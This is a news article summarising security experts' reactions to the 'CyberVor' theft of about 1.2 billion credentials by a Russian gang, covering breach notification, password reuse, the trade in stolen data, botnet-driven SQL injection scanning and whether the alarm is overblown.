The "CyberVor" cache might well be the biggest archive of login details ever obtained by one group of hackers.
Over some seven months Hold Security managed to identify the Russian cyber gang responsible, by which time the hackers had amassed 4.5 billion records, with 1.2 billion believed to be unique.
Whether or not a company has been affected there is much to learn from the breach, so here are the best responses from the security community.
1) It may be time for legislation about breach notification
Amid some controversy Hold are planning on charging websites before they tell them whether they were affected in the breach. Those willing will have to sign up to the firm’s breach notification service, at a cost of $120 (£71) a year. Unsurprisingly, some have condemned this as cynical, while others call for better regulation.
"An interesting feature of the attack having been uncovered by an independent security firm is the unstructured process by which news of which businesses have been hacked reaches those organisations," said James Mullock, partner at law firm Osborne Clarke. "There is currently little legislative guidance regulating how that process should operate and it appears ripe for review."
2) Passwords are still broken
We know you’re bored of being told how useless passwords are, but it is still as true today as it was yesterday. Hold even found pairs of emails and passwords used across different sites, which is the kind of sin security experts are always reprimanding us for.
"It’s too easy to reuse passwords across countless websites or create easy-to-guess passwords," said Laura O’Brien, technical narrator at security firm Symantec. "As a result, if an attacker manages to gain access to the user’s login credentials by breaching a website, they could potentially use the details to gain unauthorised access to several other online accounts."
The future of security may involve two-factor authentication or even biometrics, but for now users are advised to use strong passwords, and even consider a password manager – though these are not without their problems.
3) Hackers bought some of the data
The modern depiction of a hacker is not that far removed from the nerd of yesteryear, albeit a bit moodier, and more inclined to wear hoodies. Yet increasingly we are hearing reports of hacker as businessmen, even selling their wares as a product or service.
"It appears the biggest compilation of stolen credentials in the world wasn’t created through a master hacking operation, but rather the conglomeration of disparate hacking groups," said Gary Davis, vice president of global consumer marketing at McAfee.
"And that’s the thing you need to know about professional hackers: they aren’t the James Bond-esque adventurers depicted in the movies, but rather people who operate through trial and error and spreadsheets."
4) …but they also used a botnet
Many of the big security stories this year have involved botnets, where victims’ computers are unwittingly roped into distributing malware. In this case a botnet was used to identify SQL vulnerabilities in more than 400,000 sites, which were then attacked so the hackers could steal data.
"A large proportion of all the malware families that we see form some sort of botnet," said James Wyke, senior threat researcher at security firm Sophos. "In fact there are relatively few categories of malware that don’t. Even those that don’t are often spread through botnets – CryptoLocker was spread via the Gameover Zeus botnet for example."
5) It’s no time to panic
It is easy to become jaded over the seemingly constant stream of big cyber attacks in the news these days. But some argue that this particular attack is overblown, and that there’s no immediate need for people to hastily change all their passwords.
"While this sounds like a credentials disaster of the worst kind, the fact remains that we have yet to see any hard details on the various breaches – and currently no companies have come forward and admitted being affected," said Chris Boyd, malware intelligence analyst at Malwarebytes.
"If this attack really is this wide-reaching, then surely some of this information will come out in the wash eventually – with 1.2 billion passwords supposedly taken, it would be impossible for it not to."